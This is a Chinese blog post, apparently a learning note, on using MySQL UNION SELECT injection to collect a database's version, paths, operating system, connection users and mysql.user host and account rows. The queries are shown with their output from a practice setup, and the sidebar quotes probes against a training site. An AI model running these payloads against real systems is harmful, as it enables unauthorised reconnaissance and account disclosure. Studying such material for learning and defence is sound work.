SQL注入学习之数据库信息收集(五)

最新推荐文章于 2023-05-24 10:49:00 发布
最新推荐文章于 2023-05-24 10:49:00 发布
阅读量906 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 数据库 sql mysql 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzheng126/article/details/122774100
版权

0x00 版本收集与路径

识别数据库版本有助于我们进一步对数据库进行注入我们可以用到 version() @@version /*!版本号*/

/*!*/ 意为在xxx版本之上执行 我的版本是5.6所以可以执行

mysql> SELECT * FROM admin WHERE id = 1 union select 1,version(),3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
|    1 | 5.6.30-1 | 3        |
+------+----------+----------+
2 rows in set (0.00 sec)

mysql> SELECT * FROM admin WHERE id = 1 union select 1,@@version,3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | admin    |
|    1 | 5.6.30-1 | 3        |
+------+----------+----------+
2 rows in set (0.01 sec)

mysql> SELECT * FROM admin WHERE id = 1 union select 1,/*!40000 user()*/,3;
+------+----------------+----------+
| id   | username       | password |
+------+----------------+----------+
|    1 | admin          | admin    |
|    1 | root@localhost | 3        |
+------+----------------+----------+
2 rows in set (0.00 sec)

路径的话一般用@@datadir就可以了然后大概反猜下网站路径 操作系统 @@version_compile_os

0x01 用户,链接信息

system_user() //系统用户名
user() // 用户名
current_user() //当前用户名
session_user() //链接数据库的用户名

mysql> select * from users where id =1 union select system_user(),session_user(),current_user();
+--------------------+--------------------+----------+
| id                 | username           | password |
+--------------------+--------------------+----------+
| 1                  | Dumb               | Dumb     |
| root@192.168.1.101 | root@192.168.1.101 | root@%   |
+--------------------+--------------------+----------+
2 rows in set (0.00 sec)

读取host与user

mysql> select * from users where id =1 union select 1,host,user from mysql.user;
+----+-----------+----------+
| id | username  | password |
+----+-----------+----------+
|  1 | Dumb      | Dumb     |
|  1 | %         | root     |
|  1 | 127.0.0.1 | root     |
|  1 | ::1       | root     |
|  1 | localhost | root     |
+----+-----------+----------+
5 rows in set (0.00 sec)

0x02 文末

通过以上信息还能大概判断下是不是站库分离之类的

本文如有错误,请及时提醒,避免误导他人
网络安全进阶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入天书 sqli-labs
01-11
SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码,以获取、修改、删除数据库中的敏感信息,甚至控制整个服务器。本书结合理论与实践,是IT安全领域的重要学习资源。 首先,我们需要了解...
sqlcake:自动 SQL 注入和数据库信息收集工具。-开源
07-04
自动转储数据库和交互式 sql shell 工具转储当前的数据库结构,包括表和列,并变成具有额外功能的交互式 mysql 提示。 用Ruby写的。
SQL注入学习笔记
Dasdwer的博客
03-27 322
必要知识:在MySql5.0以上版本中,MySQL存在一个自带数据库名为information_schema,他是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或列名信息。一般select 有回显,insert,update,delete等无回显,需要用到报错盲注(一般使用报错回显,效率最高)sqlmap,超级sql注入工具咋用的,怎么去获取数据库,读表,查数据 ,os-shell。报错显示,遗留文件,漏洞报错,平台配置文件,爆破(网站常见路径)等。
sql注入数据库原理详解
有勇气的牛排博客
07-28 2944
文章目录1 介绍2 一般步骤3 注入3.1 数字注入3.2 搜索注入4 函数4.1 常用的系统函数4.2 连接字符串链接函数4.2.1 concat() 函数4.2.2 concat_ws() 函数 1 介绍 SQL注入漏洞主要是由于,在请求的时候没有做严格的过滤,导致传入的语句被当做SQL语句被执行,从而导致数据库受损(被脱库、删除、甚至数据付权限沦陷) 2 一般步骤 SQL注入点探测 判断什么地方存在SQL注入点,通常在表单,文章查询等与数据库有关操作的页面。 收集后台数据库信息 不同的数据库
SQL注入MySQL注入
weixin_51583033的博客
12-20 843
SQL注入MySQL注入
SQL手工注入漏洞测试(Access数据库)
天天学安全专属博客
11-10 777
SQL手工注入漏洞测试(Access数据库)和Access数据库注入
WEB漏洞—SQL注入之简要SQL注入
qq_61861243的博客
04-12 553
SQL直接去对数据库中的数据进行操作(查询,更新,删除)SQL注入不同注入点是有条件的(权限)
web安全sql注入
weixin_54584489的博客
02-21 587
本文主要为sql注入学习,对sql注入进行整体自我学习概括
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1091
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 839
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
DVWA通过攻略之SQL注入
最新发布
勿山几已
05-24 8562
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
SQL注入漏洞全接触.ppt
11-15
* SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的危害 * SQL注入漏洞可能导致敏感数据泄露、服务器被入侵、网站沦陷等严重后果。 * ...
傀儡SQL批量扫描注入工具
07-14
网络安全领域,SQL注入是一种常见的攻击手段,它利用网站应用程序对用户输入的数据处理不当,恶意篡改SQL查询语句,获取、修改、删除数据库中的敏感信息。为了防御这种攻击,以及进行安全测试,开发者和安全研究...
浅谈SQL注入
12-14
2. 盲注入:也称推理SQL注入,攻击者不直接获取数据,而是通过观察应用程序的间接反应,比如HTTP响应时间、空白页面等,来推断数据库信息。 3. 带外注入:当直接查询或响应不足以达到攻击目的时,攻击者可能构建SQL...
2024网络安全学习路线 非常详细 推荐学习
热门推荐
公众号:乌云安全
03-22 5万+
零基础学习网络安全路线图
如何学习渗透测试:初学者教程
公众号:乌云安全
08-25 1万+
免责声明:黑客攻击是一项难以学习的技能。只需做一些在线课程,你就不会成为一个好的笔友。只需安装Kali Linux并学习如何使用这些工具,你就不会成为一名优秀的测试者。这是一条充满挑战的道路,无尽的挫折感,你不会在一天 - 一个月 - 甚至一年内学会如何旅行。但是,如果你有决心,你会发现它是一个非常有益的领域,你可能永远不想离开。 在本教程中,我将具体介绍 渗透测试的Web应用程序黑客攻击 方面。...
学习web渗透测试国内、国外在线网站
公众号:乌云安全
08-20 6349
本文首发于公众号:乌云安全,提供关于渗透测试、社会工程学、黑产的技术及资讯。 国内 1、i春秋 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台。 地址:http://www.ichunqiu.com/main 2、freebuf FreeBuf黑客与极客,国内关注度最高的全球互联网安全媒体平台,同时也是爱好者们交流与分...
内网渗透工具
公众号:乌云安全
03-09 5545
一、内网渗透常见知识讲解 网络环境问题: 内外网简单判断 内网渗透中常见的几个问题有哪些呢? 防火墙穿透、木马免杀穿透、内网信息收集及定位。 内网渗透的一些工具和平台 渗透测试平台类: Metasploit Cobalt Strike Empire empure beef浏览器渗透框架项目 端口转发及代理类: sockscap proxifier Rsscoks Proxychains ssh proxy netcat,socat,hping在很多情况下可以做端口
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全进阶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值